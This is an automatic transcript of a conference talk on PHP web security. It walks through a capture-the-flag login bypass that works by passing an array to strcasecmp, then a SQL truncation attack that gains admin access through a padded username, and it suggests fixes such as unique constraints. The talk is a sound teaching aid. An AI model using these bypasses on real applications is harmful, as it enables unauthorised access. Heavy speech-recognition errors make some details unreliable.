knowledge stronger most of the hackers we work with something called capture the flag which basically means that some we have to hack the application get the flag and prove that we've been able to hack the system so there is a secret flag within this application you have to find out what is the problem to help you what i'm going to do is show you the source code of this one okay and let's see how much can you break this how many of you php developers here four okay challenge for you to sorry i'll forget it okay a clue for you that the folder name is called array it has been named array for a certain reason think just a clue for you the secret is in this file called food or php which i'm not going to open that's all it is if you notice include food or php so that means i've included that file inside the some application you have to if you really see through this you need to know username and the password how will you break this application now your coffee was useful if you guys want to see within your machines if you have pulled the repo which i have already given to you you will have that file with you yourself it's inside a folder called array within the security folder there is a please don't open the food or php and tell me the answer because i will want you to tell me how you exploited it then but i want you to read the source code and tell me how to hack this this is a weird behavior of php think what is the system doing you've downloaded the source code you have right okay see this but i've already shared the source code you can download it quite good one that's what you should be looking at think what does each function do how do you break what what is the so just to think of it what is the operation that is being done how do you break that operation correct so in real-world scenario if you knew the password what would be the output of the secret is to read what that function does what's the output of that function and only if you if you understand the function is when you can get this sorry this doesn't need sequel this is not a sequel thing at all this is a very php thing secret is not here right it don't it is inside the food or php yeah doesn't but you really don't need it you can bypass it without it should we time box it has the next speaker come yeah i think people definitely need it i had coffee nobody had anybody answers uh you want to practice play around with it and see uh i didn't get your question hack bar hack bar it's a very useful tool it's for firefox allows me to do posts and stuff like that hmm what's the challenge for you challenge you're asking me what is the output you want to get the flag basically wants to get this this between five to six to echo the yes how do you get it so obviously we can put in as the username so yes string case camp exactly give us the okay should i give you the answer do you do you guys want to answer or do you guys want to think for some more time huh sorry something to do with uh no that's a different hack not on this no there are multiple such gotchas within php itself okay see the secret of having this one is the string case compare the output should be a zero the if the return type from this function is a zero it is going to consider as it's acceptable now if that has to happen how do you do it in a normal condition you cannot pull it off but if there is an array with any of the inputs that being passed in it automatically sends out an output which is zero so if you put it as an array how do you put it as an array you go and say password and something like this if you convert your body it was the one that we were working on okay i'll open a new one if you make your body something like this you got it you see the flag come out now pk was here show off let me just open the foo file so i you got the logic it actually goes and executes what we wanted it to do the trick is here which basically means you're sending in an array when you send an array it out of the k the way php works the exit out of it is a zero which is what we wanted in the first place make sense so the next one that i want to do is a very interesting hack this is something that you could play around with i have given you the files so you can set it up and you can play it whenever you want i unfortunately my database is not working today i did the same presentation at devops days 2015 this for per se the exploit that i'm going to show now has no fix this was this bug was found by a gentleman called stefan sr i have a lot of respect for him this specific exploit has no the way it works between my sequel and php there is no fix to this itself let's so i'll show you a video now because i can't show you an exploit i'm actually showing you the video this is the same exploit that i had created sometime back you have the source codes with you so you can create it yourself it's a login it takes a user id and a password the target of this test is sorry let me tell you what i expected of you also huh that's as big as it gets that's okay let me once i finish the video i'll show you the source code i'll run through the whole thing explain why the problem is also uh yes so that you get the sound yes so what you basically it is similar to this one you have to log in with the username password let me give you a premise before this you again have to log in as a username you don't know the username password and you have to log in again hello this is not working hello uh bear with me a few more minutes so before we set this up you cannot fix you take the latest or sorry my sequel latest php if you write a code like this it's vulnerable uh it depends on both yes in a way it depends on the code yes so you have to choose how to write your passwords anyway so the whole idea was string comparisons can be dangerous you need to be very careful about how you do your string comparisons that was the previous one but this one uh i'll give you the name of this hack this hack is called sql truncation exploit so uh doesn't make sense yes so the logic of this exploit that i'm going to the logic of this exploit that is there is there is an administrator within the application you also have to become the administrator only administrators are allowed to see some content God it just hello you just come here because you're positioning hello you're you're you're you're behind the speaker so it's okay but we hear it okay i didn't know that uh maybe i shouldn't touch it something okay i'll continue as loud as i can um so you have to become the administrator okay but there is already an administrator and if you look at the source code we're also checking the passwords if the password is equal to the same password so you cannot create another administrator per se okay so once that is done let's let's look through this i'll stop at few places so where there is a register where you can create users nice thank you so much i'm so sorry for that it happened in life so you can imagine the you cannot register that happen but if you have to become an administrator how do you do this admin is already registered some of the known tools for SQL injection happens to be a tool called sql back how many of you have heard of sql back i see a few of you are back uh it's a good tool it's an amazing one of the best tools available today to bring into a sql future of more of my own people in different ways that adds so the reason i kept it as you are it's very easy to use sql map just hide the view and put the view over there so i'm running a sql map here just to prove that you cannot use any sql injection tools and so i told you right some of it cannot be detected with sql map one of the good examples someone told me font has to be made bigger is not injectable so if you run these tools it would actually say hey what's that you're not injectable in the sql literature you are seeing it and the other tool that is generally advised is zap tool uh a lot of it's an amazing tool at first you have a lot of the legal of zap is a great tool you run it through this it does not find any sql injection all it fights us is three issues it says that x-frame options x-frame options if someone would know what it is stops an attack on the x-frame um and some of the stops and x's are so it basically is like the three parameter end up with systems like this that's it it may not talk anything about how i could become an admin or how i could do a sql injection in this case now let me just go a little ahead and actually perform the attack uh what i'm going to do is a little please watch this please notice what i've done i cannot create an admin but what did i create as user there is a register dot php which can create users right i've created a user with admin 10 spaces followed by an x and password whatever you want okay uh any questions till now so i'm i could have just talked user registered now let me just so if you notice i have actually created a user admin space 10 spaces put the x and then i put a password same point to 345 the reason why this happened was i'll tell you the reason it doesn't have to be the video the reason it happened is truncation the where care when the user was created the uh table had 10 where care user where care 10 what did i do i said user 10 spaces and an x correct so if it is where care 10 or it's not technically 10 it's i think 15 or 20 so or exact you need to think on what is the exact number what would happen is at the way it behaves is it will so let's say if you are five uh in this case user is us er 4 plus 10 uh 14 uh plus 1 15 so i sent 15 characters right totally let's say the where care value is only 14 the way my sequel behaves is it removes the last and stores what it can so what it does it store in this case admin 10 spaces that's why it's called a truncation bug it removed the x and when you do a select statement and say give me select star from users for admin the way my psp works is admin is equal to admin space it does not bother it doesn't care so what then what it did so if my login sequence is like hey give me for all users were an admin and password equal to whatever it is there it will come back as a record set and generally the way we work is if the number of records is more than one you basically give a login through you got the problem here any questions on this one so this is where it's called a truncation attack you put you have to figure out how much is the length of that database field put one extra more than that you give it spaces and give the last one as something that you know we should get destroyed yes exactly i wrote the code so i know it exactly otherwise you have to try there is no way around this find out what is the amount of wire care space on that this makes sense did you did this attack this is actually not solvable if you write so what do you think as a you've been developers here what is the fix for this problem sorry and here uh not really there could be a much easier way of doing it huh uh no there's actually one sequel thing that is very useful there's something in sequel which helps you do this well you could you could not write it immediately to the database you could you could you know like you said trim it in before yeah but what if you just set an unique constraint as simple as that ensure that you whenever you pull out data you have an unique constraint that's it this will never happen constraint so the way it then it when it when you're setting it itself it'll say okay i have a value already which is admin okay and it will not allow you to save the data inside as simple as that that solves the problem sorry uh you had a question i can't hear i'll come sorry uh which is where the problem is you should think the way the easy way to solve it is yeah now constraint uh unique constraint yes you had a question you will not remove it see the problem is not with the space at all so the way it works is when you put admin 10 spaces and you put an x and your total where care available is only 14 this is 15 characters right right so it will drop the one character at the last and it'll store only 14 so when it i'll show you the source code now so what is actually technically happening it is one user admin is already existing but now the next record is admin 10 spaces but when you're doing a select query there is no difference between an admin and an admin space that's why this lot you can basically break it so when you say select star from login where user equal to admin and password equal to whatever the user puts both the records will come because the way php things admin and admin space are the same things make sense uh let me let me just before we go i'll show you the source code because it it's fun to so so the fun is in uh register dot php uh is it enough are you able to see it clearly okay so i'm taking a username password first things i'm checking is if the user admin is existing or not it clearly throws out the user saying if you try admin again you cannot log in next if the password is equal to something that the user has already entered it does not but let's say that's not a control look i'm what am i doing my sequel insert into user user password okay the way i created is the user field was work are 14 so when i enter 15 it will only store 14 it will not store 15 okay let's as simple as this but now let's say you open this and see how login works user equal to i've hard coded it to be supposed to be admin still i'm able to log in as admin space right if you see the video it said that welcome you're an administrator the reason being is like this see the output i wanted how did i check once i get the output if the record sets is more than zero it will be more than zero because it will for admin it and i have created admin space with the password one two three four five it's a valid record it will be sent back that record and i have basically logged in yes any system this is a the way php works you'll have to you'll have to work around this one so think about putting a unique constraint around it or trim all that is definitely a possibilities how do you do it is totally up to you you could read about this this specific one is called a sql truncation attack i wanted to do something more but we can keep it to a later date let's call it it's already more than my time allowed thank you so much if you have any questions please do ask